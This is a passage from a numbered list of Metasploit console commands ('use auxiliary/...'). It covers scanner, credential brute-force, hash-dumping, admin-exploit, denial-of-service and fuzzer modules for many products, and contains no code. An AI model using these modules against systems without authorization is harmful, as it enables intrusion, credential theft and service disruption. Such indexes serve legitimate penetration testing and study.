  638. use auxiliary/scanner/http/rewrite_proxy_bypass
  639. use auxiliary/scanner/http/rfcode_reader_enum
  640. use auxiliary/scanner/http/rips_traversal
  641. use auxiliary/scanner/http/robots_txt
  642. use auxiliary/scanner/http/s40_traversal
  643. use auxiliary/scanner/http/sap_businessobjects_user_brute
  644. use auxiliary/scanner/http/sap_businessobjects_user_brute_web
  645. use auxiliary/scanner/http/sap_businessobjects_user_enum
  646. use auxiliary/scanner/http/sap_businessobjects_version_enum
  647. use auxiliary/scanner/http/scraper
  648. use auxiliary/scanner/http/sentry_cdu_enum
  649. use auxiliary/scanner/http/servicedesk_plus_traversal
  650. use auxiliary/scanner/http/sevone_enum
  651. use auxiliary/scanner/http/simple_webserver_traversal
  652. use auxiliary/scanner/http/smt_ipmi_49152_exposure
  653. use auxiliary/scanner/http/smt_ipmi_cgi_scanner
  654. use auxiliary/scanner/http/smt_ipmi_static_cert_scanner
  655. use auxiliary/scanner/http/smt_ipmi_url_redirect_traversal
  656. use auxiliary/scanner/http/soap_xml
  657. use auxiliary/scanner/http/sockso_traversal
  658. use auxiliary/scanner/http/splunk_web_login
  659. use auxiliary/scanner/http/squid_pivot_scanning
  660. use auxiliary/scanner/http/squiz_matrix_user_enum
  661. use auxiliary/scanner/http/ssl
  662. use auxiliary/scanner/http/ssl_version
  663. use auxiliary/scanner/http/support_center_plus_directory_traversal
  664. use auxiliary/scanner/http/svn_scanner
  665. use auxiliary/scanner/http/svn_wcdb_scanner
  666. use auxiliary/scanner/http/sybase_easerver_traversal
  667. use auxiliary/scanner/http/symantec_brightmail_ldapcreds
  668. use auxiliary/scanner/http/symantec_brightmail_logfile
  669. use auxiliary/scanner/http/symantec_web_gateway_login
  670. use auxiliary/scanner/http/titan_ftp_admin_pwd
  671. use auxiliary/scanner/http/title
  672. use auxiliary/scanner/http/tomcat_enum
  673. use auxiliary/scanner/http/tomcat_mgr_login
  674. use auxiliary/scanner/http/tplink_traversal_noauth
  675. use auxiliary/scanner/http/trace
  676. use auxiliary/scanner/http/trace_axd
  677. use auxiliary/scanner/http/typo3_bruteforce
  678. use auxiliary/scanner/http/vcms_login
  679. use auxiliary/scanner/http/verb_auth_bypass
  680. use auxiliary/scanner/http/vhost_scanner
  681. use auxiliary/scanner/http/wangkongbao_traversal
  682. use auxiliary/scanner/http/web_vulndb
  683. use auxiliary/scanner/http/webdav_internal_ip
  684. use auxiliary/scanner/http/webdav_scanner
  685. use auxiliary/scanner/http/webdav_website_content
  686. use auxiliary/scanner/http/webpagetest_traversal
  687. use auxiliary/scanner/http/wildfly_traversal
  688. use auxiliary/scanner/http/wordpress_cp_calendar_sqli
  689. use auxiliary/scanner/http/wordpress_ghost_scanner
  690. use auxiliary/scanner/http/wordpress_login_enum
  691. use auxiliary/scanner/http/wordpress_multicall_creds
  692. use auxiliary/scanner/http/wordpress_pingback_access
  693. use auxiliary/scanner/http/wordpress_scanner
  694. use auxiliary/scanner/http/wordpress_xmlrpc_login
  695. use auxiliary/scanner/http/wp_contus_video_gallery_sqli
  696. use auxiliary/scanner/http/wp_dukapress_file_read
  697. use auxiliary/scanner/http/wp_gimedia_library_file_read
  698. use auxiliary/scanner/http/wp_mobile_pack_info_disclosure
  699. use auxiliary/scanner/http/wp_mobileedition_file_read
  700. use auxiliary/scanner/http/wp_nextgen_galley_file_read
  701. use auxiliary/scanner/http/wp_simple_backup_file_read
  702. use auxiliary/scanner/http/wp_subscribe_comments_file_read
  703. use auxiliary/scanner/http/xpath
  704. use auxiliary/scanner/http/yaws_traversal
  705. use auxiliary/scanner/http/zabbix_login
  706. use auxiliary/scanner/http/zenworks_assetmanagement_fileaccess
  707. use auxiliary/scanner/http/zenworks_assetmanagement_getconfig
  708. use auxiliary/scanner/ike/cisco_ike_benigncertain
  709. use auxiliary/scanner/imap/imap_version
  710. use auxiliary/scanner/ip/ipidseq
  711. use auxiliary/scanner/ipmi/ipmi_cipher_zero
  712. use auxiliary/scanner/ipmi/ipmi_dumphashes
  713. use auxiliary/scanner/ipmi/ipmi_version
  714. use auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum
  715. use auxiliary/scanner/kademlia/server_info
  716. use auxiliary/scanner/llmnr/query
  717. use auxiliary/scanner/lotus/lotus_domino_hashes
  718. use auxiliary/scanner/lotus/lotus_domino_login
  719. use auxiliary/scanner/lotus/lotus_domino_version
  720. use auxiliary/scanner/mdns/query
  721. use auxiliary/scanner/misc/cctv_dvr_login
  722. use auxiliary/scanner/misc/clamav_control
  723. use auxiliary/scanner/misc/dahua_dvr_auth_bypass
  724. use auxiliary/scanner/misc/dvr_config_disclosure
  725. use auxiliary/scanner/misc/easycafe_server_fileaccess
  726. use auxiliary/scanner/misc/ib_service_mgr_info
  727. use auxiliary/scanner/misc/java_rmi_server
  728. use auxiliary/scanner/misc/oki_scanner
  729. use auxiliary/scanner/misc/poisonivy_control_scanner
  730. use auxiliary/scanner/misc/raysharp_dvr_passwords
  731. use auxiliary/scanner/misc/rosewill_rxs3211_passwords
  732. use auxiliary/scanner/misc/sercomm_backdoor_scanner
  733. use auxiliary/scanner/misc/sunrpc_portmapper
  734. use auxiliary/scanner/misc/zenworks_preboot_fileaccess
  735. use auxiliary/scanner/mongodb/mongodb_login
  736. use auxiliary/scanner/motorola/timbuktu_udp
  737. use auxiliary/scanner/msf/msf_rpc_login
  738. use auxiliary/scanner/msf/msf_web_login
  739. use auxiliary/scanner/mssql/mssql_hashdump
  740. use auxiliary/scanner/mssql/mssql_login
  741. use auxiliary/scanner/mssql/mssql_ping
  742. use auxiliary/scanner/mssql/mssql_schemadump
  743. use auxiliary/scanner/mysql/mysql_authbypass_hashdump
  744. use auxiliary/scanner/mysql/mysql_file_enum
  745. use auxiliary/scanner/mysql/mysql_hashdump
  746. use auxiliary/scanner/mysql/mysql_login
  747. use auxiliary/scanner/mysql/mysql_schemadump
  748. use auxiliary/scanner/mysql/mysql_version
  749. use auxiliary/scanner/mysql/mysql_writable_dirs
  750. use auxiliary/scanner/natpmp/natpmp_portscan
  751. use auxiliary/scanner/nessus/nessus_ntp_login
  752. use auxiliary/scanner/nessus/nessus_rest_login
  753. use auxiliary/scanner/nessus/nessus_xmlrpc_login
  754. use auxiliary/scanner/nessus/nessus_xmlrpc_ping
  755. use auxiliary/scanner/netbios/nbname
  756. use auxiliary/scanner/nexpose/nexpose_api_login
  757. use auxiliary/scanner/nfs/nfsmount
  758. use auxiliary/scanner/ntp/ntp_monlist
  759. use auxiliary/scanner/ntp/ntp_nak_to_the_future
  760. use auxiliary/scanner/ntp/ntp_peer_list_dos
  761. use auxiliary/scanner/ntp/ntp_peer_list_sum_dos
  762. use auxiliary/scanner/ntp/ntp_readvar
  763. use auxiliary/scanner/ntp/ntp_req_nonce_dos
  764. use auxiliary/scanner/ntp/ntp_reslist_dos
  765. use auxiliary/scanner/ntp/ntp_unsettrap_dos
  766. use auxiliary/scanner/openvas/openvas_gsad_login
  767. use auxiliary/scanner/openvas/openvas_omp_login
  768. use auxiliary/scanner/openvas/openvas_otp_login
  769. use auxiliary/scanner/oracle/emc_sid
  770. use auxiliary/scanner/oracle/isqlplus_login
  771. use auxiliary/scanner/oracle/isqlplus_sidbrute
  772. use auxiliary/scanner/oracle/oracle_hashdump
  773. use auxiliary/scanner/oracle/oracle_login
  774. use auxiliary/scanner/oracle/sid_brute
  775. use auxiliary/scanner/oracle/sid_enum
  776. use auxiliary/scanner/oracle/spy_sid
  777. use auxiliary/scanner/oracle/tnslsnr_version
  778. use auxiliary/scanner/oracle/tnspoison_checker
  779. use auxiliary/scanner/oracle/xdb_sid
  780. use auxiliary/scanner/oracle/xdb_sid_brute
  781. use auxiliary/scanner/pcanywhere/pcanywhere_login
  782. use auxiliary/scanner/pcanywhere/pcanywhere_tcp
  783. use auxiliary/scanner/pcanywhere/pcanywhere_udp
  784. use auxiliary/scanner/pop3/pop3_login
  785. use auxiliary/scanner/pop3/pop3_version
  786. use auxiliary/scanner/portmap/portmap_amp
  787. use auxiliary/scanner/portscan/ack
  788. use auxiliary/scanner/portscan/ftpbounce
  789. use auxiliary/scanner/portscan/syn
  790. use auxiliary/scanner/portscan/tcp
  791. use auxiliary/scanner/portscan/xmas
  792. use auxiliary/scanner/postgres/postgres_dbname_flag_injection
  793. use auxiliary/scanner/postgres/postgres_hashdump
  794. use auxiliary/scanner/postgres/postgres_login
  795. use auxiliary/scanner/postgres/postgres_schemadump
  796. use auxiliary/scanner/postgres/postgres_version
  797. use auxiliary/scanner/printer/canon_iradv_pwd_extract
  798. use auxiliary/scanner/printer/printer_delete_file
  799. use auxiliary/scanner/printer/printer_download_file
  800. use auxiliary/scanner/printer/printer_env_vars
  801. use auxiliary/scanner/printer/printer_list_dir
  802. use auxiliary/scanner/printer/printer_list_volumes
  803. use auxiliary/scanner/printer/printer_ready_message
  804. use auxiliary/scanner/printer/printer_upload_file
  805. use auxiliary/scanner/printer/printer_version_info
  806. use auxiliary/scanner/quake/server_info
  807. use auxiliary/scanner/rdp/ms12_020_check
  808. use auxiliary/scanner/redis/file_upload
  809. use auxiliary/scanner/redis/redis_login
  810. use auxiliary/scanner/redis/redis_server
  811. use auxiliary/scanner/rogue/rogue_recv
  812. use auxiliary/scanner/rogue/rogue_send
  813. use auxiliary/scanner/rservices/rexec_login
  814. use auxiliary/scanner/rservices/rlogin_login
  815. use auxiliary/scanner/rservices/rsh_login
  816. use auxiliary/scanner/rsync/modules_list
  817. use auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt
  818. use auxiliary/scanner/sap/sap_hostctrl_getcomputersystem
  819. use auxiliary/scanner/sap/sap_icf_public_info
  820. use auxiliary/scanner/sap/sap_icm_urlscan
  821. use auxiliary/scanner/sap/sap_mgmt_con_abaplog
  822. use auxiliary/scanner/sap/sap_mgmt_con_brute_login
  823. use auxiliary/scanner/sap/sap_mgmt_con_extractusers
  824. use auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints
  825. use auxiliary/scanner/sap/sap_mgmt_con_getenv
  826. use auxiliary/scanner/sap/sap_mgmt_con_getlogfiles
  827. use auxiliary/scanner/sap/sap_mgmt_con_getprocesslist
  828. use auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter
  829. use auxiliary/scanner/sap/sap_mgmt_con_instanceproperties
  830. use auxiliary/scanner/sap/sap_mgmt_con_listlogfiles
  831. use auxiliary/scanner/sap/sap_mgmt_con_startprofile
  832. use auxiliary/scanner/sap/sap_mgmt_con_version
  833. use auxiliary/scanner/sap/sap_router_info_request
  834. use auxiliary/scanner/sap/sap_router_portscanner
  835. use auxiliary/scanner/sap/sap_service_discovery
  836. use auxiliary/scanner/sap/sap_smb_relay
  837. use auxiliary/scanner/sap/sap_soap_bapi_user_create1
  838. use auxiliary/scanner/sap/sap_soap_rfc_brute_login
  839. use auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec
  840. use auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec
  841. use auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing
  842. use auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence
  843. use auxiliary/scanner/sap/sap_soap_rfc_ping
  844. use auxiliary/scanner/sap/sap_soap_rfc_read_table
  845. use auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir
  846. use auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface
  847. use auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec
  848. use auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec
  849. use auxiliary/scanner/sap/sap_soap_rfc_system_info
  850. use auxiliary/scanner/sap/sap_soap_th_saprel_disclosure
  851. use auxiliary/scanner/sap/sap_web_gui_brute_login
  852. use auxiliary/scanner/scada/digi_addp_reboot
  853. use auxiliary/scanner/scada/digi_addp_version
  854. use auxiliary/scanner/scada/digi_realport_serialport_scan
  855. use auxiliary/scanner/scada/digi_realport_version
  856. use auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess
  857. use auxiliary/scanner/scada/koyo_login
  858. use auxiliary/scanner/scada/modbus_findunitid
  859. use auxiliary/scanner/scada/modbusclient
  860. use auxiliary/scanner/scada/modbusdetect
  861. use auxiliary/scanner/scada/profinet_siemens
  862. use auxiliary/scanner/scada/sielco_winlog_fileaccess
  863. use auxiliary/scanner/sip/enumerator
  864. use auxiliary/scanner/sip/enumerator_tcp
  865. use auxiliary/scanner/sip/options
  866. use auxiliary/scanner/sip/options_tcp
  867. use auxiliary/scanner/sip/sipdroid_ext_enum
  868. use auxiliary/scanner/smb/pipe_auditor
  869. use auxiliary/scanner/smb/pipe_dcerpc_auditor
  870. use auxiliary/scanner/smb/psexec_loggedin_users
  871. use auxiliary/scanner/smb/smb2
  872. use auxiliary/scanner/smb/smb_enum_gpp
  873. use auxiliary/scanner/smb/smb_enumshares
  874. use auxiliary/scanner/smb/smb_enumusers
  875. use auxiliary/scanner/smb/smb_enumusers_domain
  876. use auxiliary/scanner/smb/smb_login
  877. use auxiliary/scanner/smb/smb_lookupsid
  878. use auxiliary/scanner/smb/smb_uninit_cred
  879. use auxiliary/scanner/smb/smb_version
  880. use auxiliary/scanner/smtp/smtp_enum
  881. use auxiliary/scanner/smtp/smtp_ntlm_domain
  882. use auxiliary/scanner/smtp/smtp_relay
  883. use auxiliary/scanner/smtp/smtp_version
  884. use auxiliary/scanner/snmp/aix_version
  885. use auxiliary/scanner/snmp/arris_dg950
  886. use auxiliary/scanner/snmp/brocade_enumhash
  887. use auxiliary/scanner/snmp/cisco_config_tftp
  888. use auxiliary/scanner/snmp/cisco_upload_file
  889. use auxiliary/scanner/snmp/netopia_enum
  890. use auxiliary/scanner/snmp/sbg6580_enum
  891. use auxiliary/scanner/snmp/snmp_enum
  892. use auxiliary/scanner/snmp/snmp_enum_hp_laserjet
  893. use auxiliary/scanner/snmp/snmp_enumshares
  894. use auxiliary/scanner/snmp/snmp_enumusers
  895. use auxiliary/scanner/snmp/snmp_login
  896. use auxiliary/scanner/snmp/snmp_set
  897. use auxiliary/scanner/snmp/ubee_ddw3611
  898. use auxiliary/scanner/snmp/xerox_workcentre_enumusers
  899. use auxiliary/scanner/ssh/apache_karaf_command_execution
  900. use auxiliary/scanner/ssh/cerberus_sftp_enumusers
  901. use auxiliary/scanner/ssh/detect_kippo
  902. use auxiliary/scanner/ssh/fortinet_backdoor
  903. use auxiliary/scanner/ssh/juniper_backdoor
  904. use auxiliary/scanner/ssh/karaf_login
  905. use auxiliary/scanner/ssh/ssh_enumusers
  906. use auxiliary/scanner/ssh/ssh_identify_pubkeys
  907. use auxiliary/scanner/ssh/ssh_login
  908. use auxiliary/scanner/ssh/ssh_login_pubkey
  909. use auxiliary/scanner/ssh/ssh_version
  910. use auxiliary/scanner/ssl/openssl_ccs
  911. use auxiliary/scanner/ssl/openssl_heartbleed
  912. use auxiliary/scanner/steam/server_info
  913. use auxiliary/scanner/telephony/wardial
  914. use auxiliary/scanner/telnet/brocade_enable_login
  915. use auxiliary/scanner/telnet/lantronix_telnet_password
  916. use auxiliary/scanner/telnet/lantronix_telnet_version
  917. use auxiliary/scanner/telnet/telnet_encrypt_overflow
  918. use auxiliary/scanner/telnet/telnet_login
  919. use auxiliary/scanner/telnet/telnet_ruggedcom
  920. use auxiliary/scanner/telnet/telnet_version
  921. use auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp
  922. use auxiliary/scanner/tftp/netdecision_tftp
  923. use auxiliary/scanner/tftp/tftpbrute
  924. use auxiliary/scanner/udp/udp_amplification
  925. use auxiliary/scanner/udp_scanner_template
  926. use auxiliary/scanner/upnp/ssdp_amp
  927. use auxiliary/scanner/upnp/ssdp_msearch
  928. use auxiliary/scanner/vmware/esx_fingerprint
  929. use auxiliary/scanner/vmware/vmauthd_login
  930. use auxiliary/scanner/vmware/vmauthd_version
  931. use auxiliary/scanner/vmware/vmware_enum_permissions
  932. use auxiliary/scanner/vmware/vmware_enum_sessions
  933. use auxiliary/scanner/vmware/vmware_enum_users
  934. use auxiliary/scanner/vmware/vmware_enum_vms
  935. use auxiliary/scanner/vmware/vmware_host_details
  936. use auxiliary/scanner/vmware/vmware_http_login
  937. use auxiliary/scanner/vmware/vmware_screenshot_stealer
  938. use auxiliary/scanner/vmware/vmware_server_dir_trav
  939. use auxiliary/scanner/vmware/vmware_update_manager_traversal
  940. use auxiliary/scanner/vnc/vnc_login
  941. use auxiliary/scanner/vnc/vnc_none_auth
  942. use auxiliary/scanner/voice/recorder
  943. use auxiliary/scanner/vxworks/wdbrpc_bootline
  944. use auxiliary/scanner/vxworks/wdbrpc_version
  945. use auxiliary/scanner/winrm/winrm_auth_methods
  946. use auxiliary/scanner/winrm/winrm_cmd
  947. use auxiliary/scanner/winrm/winrm_login
  948. use auxiliary/scanner/winrm/winrm_wql
  949. use auxiliary/scanner/x11/open_x11
  950. msf >use auxiliarys/
  951. use auxiliary/admin/android/google_play_store_uxss_xframe_rce
  952. use auxiliary/admin/appletv/appletv_display_image
  953. use auxiliary/admin/appletv/appletv_display_video
  954. use auxiliary/admin/backupexec/dump
  955. use auxiliary/admin/backupexec/registry
  956. use auxiliary/admin/chromecast/chromecast_reset
  957. use auxiliary/admin/chromecast/chromecast_youtube
  958. use auxiliary/admin/cisco/cisco_secure_acs_bypass
  959. use auxiliary/admin/cisco/vpn_3000_ftp_bypass
  960. use auxiliary/admin/db2/db2rcmd
  961. use auxiliary/admin/edirectory/edirectory_dhost_cookie
  962. use auxiliary/admin/edirectory/edirectory_edirutil
  963. use auxiliary/admin/emc/alphastor_devicemanager_exec
  964. use auxiliary/admin/emc/alphastor_librarymanager_exec
  965. use auxiliary/admin/firetv/firetv_youtube
  966. use auxiliary/admin/hp/hp_data_protector_cmd
  967. use auxiliary/admin/hp/hp_imc_som_create_account
  968. use auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss
  969. use auxiliary/admin/http/axigen_file_access
  970. use auxiliary/admin/http/cfme_manageiq_evm_pass_reset
  971. use auxiliary/admin/http/contentkeeper_fileaccess
  972. use auxiliary/admin/http/dlink_dir_300_600_exec_noauth
  973. use auxiliary/admin/http/dlink_dir_645_password_extractor
  974. use auxiliary/admin/http/dlink_dsl320b_password_extractor
  975. use auxiliary/admin/http/foreman_openstack_satellite_priv_esc
  976. use auxiliary/admin/http/hp_web_jetadmin_exec
  977. use auxiliary/admin/http/iis_auth_bypass
  978. use auxiliary/admin/http/intersil_pass_reset
  979. use auxiliary/admin/http/iomega_storcenterpro_sessionid
  980. use auxiliary/admin/http/jboss_bshdeployer
  981. use auxiliary/admin/http/jboss_deploymentfilerepository
  982. use auxiliary/admin/http/jboss_seam_exec
  983. use auxiliary/admin/http/katello_satellite_priv_esc
  984. use auxiliary/admin/http/linksys_e1500_e2500_exec
  985. use auxiliary/admin/http/linksys_tmunblock_admin_reset_bof
  986. use auxiliary/admin/http/linksys_wrt54gl_exec
  987. use auxiliary/admin/http/manage_engine_dc_create_admin
  988. use auxiliary/admin/http/manageengine_dir_listing
  989. use auxiliary/admin/http/manageengine_file_download
  990. use auxiliary/admin/http/manageengine_pmp_privesc
  991. use auxiliary/admin/http/mutiny_frontend_read_delete
  992. use auxiliary/admin/http/netflow_file_download
  993. use auxiliary/admin/http/nexpose_xxe_file_read
  994. use auxiliary/admin/http/novell_file_reporter_filedelete
  995. use auxiliary/admin/http/openbravo_xxe
  996. use auxiliary/admin/http/rails_devise_pass_reset
  997. use auxiliary/admin/http/scrutinizer_add_user
  998. use auxiliary/admin/http/sophos_wpa_traversal
  999. use auxiliary/admin/http/tomcat_administration
  1000. use auxiliary/admin/http/tomcat_utf8_traversal
  1001. use auxiliary/admin/http/typo3_sa_2009_001
  1002. use auxiliary/admin/http/typo3_sa_2009_002
  1003. use auxiliary/admin/http/typo3_sa_2010_020
  1004. use auxiliary/admin/http/typo3_winstaller_default_enc_keys
  1005. use auxiliary/admin/http/vbulletin_upgrade_admin
  1006. use auxiliary/admin/http/wp_custom_contact_forms
  1007. use auxiliary/admin/http/wp_easycart_privilege_escalation
  1008. use auxiliary/admin/http/wp_wplms_privilege_escalation
  1009. use auxiliary/admin/http/zyxel_admin_password_extractor
  1010. use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
  1011. use auxiliary/admin/maxdb/maxdb_cons_exec
  1012. use auxiliary/admin/misc/sercomm_dump_config
  1013. use auxiliary/admin/misc/wol
  1014. use auxiliary/admin/motorola/wr850g_cred
  1015. use auxiliary/admin/ms/ms08_059_his2006
  1016. use auxiliary/admin/mssql/mssql_enum
  1017. use auxiliary/admin/mssql/mssql_enum_domain_accounts
  1018. use auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli
  1019. use auxiliary/admin/mssql/mssql_enum_sql_logins
  1020. use auxiliary/admin/mssql/mssql_escalate_dbowner
  1021. use auxiliary/admin/mssql/mssql_escalate_dbowner_sqli
  1022. use auxiliary/admin/mssql/mssql_escalate_execute_as
  1023. use auxiliary/admin/mssql/mssql_escalate_execute_as_sqli
  1024. use auxiliary/admin/mssql/mssql_exec
  1025. use auxiliary/admin/mssql/mssql_findandsampledata
  1026. use auxiliary/admin/mssql/mssql_idf
  1027. use auxiliary/admin/mssql/mssql_ntlm_stealer
  1028. use auxiliary/admin/mssql/mssql_ntlm_stealer_sqli
  1029. use auxiliary/admin/mssql/mssql_sql
  1030. use auxiliary/admin/mssql/mssql_sql_file
  1031. use auxiliary/admin/mysql/mysql_enum
  1032. use auxiliary/admin/mysql/mysql_sql
  1033. use auxiliary/admin/natpmp/natpmp_map
  1034. use auxiliary/admin/officescan/tmlisten_traversal
  1035. use auxiliary/admin/oracle/ora_ntlm_stealer
  1036. use auxiliary/admin/oracle/oracle_login
  1037. use auxiliary/admin/oracle/oracle_sql
  1038. use auxiliary/admin/oracle/oraenum
  1039. use auxiliary/admin/oracle/osb_execqr
  1040. use auxiliary/admin/oracle/osb_execqr2
  1041. use auxiliary/admin/oracle/osb_execqr3
  1042. use auxiliary/admin/oracle/post_exploitation/win32exec
  1043. use auxiliary/admin/oracle/post_exploitation/win32upload
  1044. use auxiliary/admin/oracle/sid_brute
  1045. use auxiliary/admin/oracle/tnscmd
  1046. use auxiliary/admin/pop2/uw_fileretrieval
  1047. use auxiliary/admin/postgres/postgres_readfile
  1048. use auxiliary/admin/postgres/postgres_sql
  1049. use auxiliary/admin/sap/sap_configservlet_exec_noauth
  1050. use auxiliary/admin/sap/sap_mgmt_con_osexec
  1051. use auxiliary/admin/scada/ge_proficy_substitute_traversal
  1052. use auxiliary/admin/scada/modicon_command
  1053. use auxiliary/admin/scada/modicon_password_recovery
  1054. use auxiliary/admin/scada/modicon_stux_transfer
  1055. use auxiliary/admin/scada/multi_cip_command
  1056. use auxiliary/admin/scada/yokogawa_bkbcopyd_client
  1057. use auxiliary/admin/serverprotect/file
  1058. use auxiliary/admin/smb/check_dir_file
  1059. use auxiliary/admin/smb/delete_file
  1060. use auxiliary/admin/smb/download_file
  1061. use auxiliary/admin/smb/list_directory
  1062. use auxiliary/admin/smb/psexec_command
  1063. use auxiliary/admin/smb/psexec_ntdsgrab
  1064. use auxiliary/admin/smb/samba_symlink_traversal
  1065. use auxiliary/admin/smb/upload_file
  1066. use auxiliary/admin/sunrpc/solaris_kcms_readfile
  1067. use auxiliary/admin/tftp/tftp_transfer_util
  1068. use auxiliary/admin/tikiwiki/tikidblib
  1069. use auxiliary/admin/vmware/poweroff_vm
  1070. use auxiliary/admin/vmware/poweron_vm
  1071. use auxiliary/admin/vmware/tag_vm
  1072. use auxiliary/admin/vmware/terminate_esx_sessions
  1073. use auxiliary/admin/vnc/realvnc_41_bypass
  1074. use auxiliary/admin/vxworks/apple_airport_extreme_password
  1075. use auxiliary/admin/vxworks/dlink_i2eye_autoanswer
  1076. use auxiliary/admin/vxworks/wdbrpc_memory_dump
  1077. use auxiliary/admin/vxworks/wdbrpc_reboot
  1078. use auxiliary/admin/webmin/edit_html_fileaccess
  1079. use auxiliary/admin/webmin/file_disclosure
  1080. use auxiliary/admin/zend/java_bridge
  1081. use auxiliary/analyze/jtr_aix
  1082. use auxiliary/analyze/jtr_crack_fast
  1083. use auxiliary/analyze/jtr_linux
  1084. use auxiliary/analyze/jtr_mssql_fast
  1085. use auxiliary/analyze/jtr_mysql_fast
  1086. use auxiliary/analyze/jtr_oracle_fast
  1087. use auxiliary/analyze/jtr_postgres_fast
  1088. use auxiliary/bnat/bnat_router
  1089. use auxiliary/bnat/bnat_scan
  1090. use auxiliary/client/smtp/emailer
  1091. use auxiliary/crawler/msfcrawler
  1092. use auxiliary/docx/word_unc_injector
  1093. use auxiliary/dos/cisco/ios_http_percentpercent
  1094. use auxiliary/dos/dhcp/isc_dhcpd_clientid
  1095. use auxiliary/dos/freebsd/nfsd/nfsd_mount
  1096. use auxiliary/dos/hp/data_protector_rds
  1097. use auxiliary/dos/http/3com_superstack_switch
  1098. use auxiliary/dos/http/apache_commons_fileupload_dos
  1099. use auxiliary/dos/http/apache_mod_isapi
  1100. use auxiliary/dos/http/apache_range_dos
  1101. use auxiliary/dos/http/canon_wireless_printer
  1102. use auxiliary/dos/http/dell_openmanage_post
  1103. use auxiliary/dos/http/gzip_bomb_dos
  1104. use auxiliary/dos/http/hashcollision_dos
  1105. use auxiliary/dos/http/monkey_headers
  1106. use auxiliary/dos/http/ms15_034_ulonglongadd
  1107. use auxiliary/dos/http/nodejs_pipelining
  1108. use auxiliary/dos/http/novell_file_reporter_heap_bof
  1109. use auxiliary/dos/http/rails_action_view
  1110. use auxiliary/dos/http/rails_json_float_dos
  1111. use auxiliary/dos/http/sonicwall_ssl_format
  1112. use auxiliary/dos/http/webrick_regex
  1113. use auxiliary/dos/http/wordpress_long_password_dos
  1114. use auxiliary/dos/http/wordpress_xmlrpc_dos
  1115. use auxiliary/dos/mdns/avahi_portzero
  1116. use auxiliary/dos/misc/dopewars
  1117. use auxiliary/dos/misc/ibm_sametime_webplayer_dos
  1118. use auxiliary/dos/misc/memcached
  1119. use auxiliary/dos/ntp/ntpd_reserved_dos
  1120. use auxiliary/dos/pptp/ms02_063_pptp_dos
  1121. use auxiliary/dos/samba/lsa_addprivs_heap
  1122. use auxiliary/dos/samba/lsa_transnames_heap
  1123. use auxiliary/dos/samba/read_nttrans_ea_list
  1124. use auxiliary/dos/sap/sap_soap_rfc_eps_delete_file
  1125. use auxiliary/dos/scada/beckhoff_twincat
  1126. use auxiliary/dos/scada/d20_tftp_overflow
  1127. use auxiliary/dos/scada/igss9_dataserver
  1128. use auxiliary/dos/scada/yokogawa_logsvr
  1129. use auxiliary/dos/smtp/sendmail_prescan
  1130. use auxiliary/dos/solaris/lpd/cascade_delete
  1131. use auxiliary/dos/ssl/dtls_changecipherspec
  1132. use auxiliary/dos/ssl/dtls_fragment_overflow
  1133. use auxiliary/dos/ssl/openssl_aesni
  1134. use auxiliary/dos/syslog/rsyslog_long_tag
  1135. use auxiliary/dos/tcp/junos_tcp_opt
  1136. use auxiliary/dos/tcp/synflood
  1137. use auxiliary/dos/upnp/miniupnpd_dos
  1138. use auxiliary/dos/windows/appian/appian_bpm
  1139. use auxiliary/dos/windows/browser/ms09_065_eot_integer
  1140. use auxiliary/dos/windows/ftp/filezilla_admin_user
  1141. use auxiliary/dos/windows/ftp/filezilla_server_port
  1142. use auxiliary/dos/windows/ftp/guildftp_cwdlist
  1143. use auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof
  1144. use auxiliary/dos/windows/ftp/iis_list_exhaustion
  1145. use auxiliary/dos/windows/ftp/solarftp_user
  1146. use auxiliary/dos/windows/ftp/titan626_site
  1147. use auxiliary/dos/windows/ftp/vicftps50_list
  1148. use auxiliary/dos/windows/ftp/winftp230_nlst
  1149. use auxiliary/dos/windows/ftp/xmeasy560_nlst
  1150. use auxiliary/dos/windows/ftp/xmeasy570_nlst
  1151. use auxiliary/dos/windows/http/ms10_065_ii6_asp_dos
  1152. use auxiliary/dos/windows/http/pi3web_isapi
  1153. use auxiliary/dos/windows/llmnr/ms11_030_dnsapi
  1154. use auxiliary/dos/windows/nat/nat_helper
  1155. use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
  1156. use auxiliary/dos/windows/smb/ms05_047_pnp
  1157. use auxiliary/dos/windows/smb/ms06_035_mailslot
  1158. use auxiliary/dos/windows/smb/ms06_063_trans
  1159. use auxiliary/dos/windows/smb/ms09_001_write
  1160. use auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh
  1161. use auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff
  1162. use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
  1163. use auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow
  1164. use auxiliary/dos/windows/smb/ms11_019_electbowser
  1165. use auxiliary/dos/windows/smb/rras_vls_null_deref
  1166. use auxiliary/dos/windows/smb/vista_negotiate_stop
  1167. use auxiliary/dos/windows/smtp/ms06_019_exchange
  1168. use auxiliary/dos/windows/ssh/sysax_sshd_kexchange
  1169. use auxiliary/dos/windows/tftp/pt360_write
  1170. use auxiliary/dos/windows/tftp/solarwinds
  1171. use auxiliary/dos/wireshark/capwap
  1172. use auxiliary/dos/wireshark/chunked
  1173. use auxiliary/dos/wireshark/cldap
  1174. use auxiliary/dos/wireshark/ldap
  1175. use auxiliary/fuzzers/dns/dns_fuzzer
  1176. use auxiliary/fuzzers/ftp/client_ftp
  1177. use auxiliary/fuzzers/ftp/ftp_pre_post
  1178. use auxiliary/fuzzers/http/http_form_field
  1179. use auxiliary/fuzzers/http/http_get_uri_long
  1180. use auxiliary/fuzzers/http/http_get_uri_strings
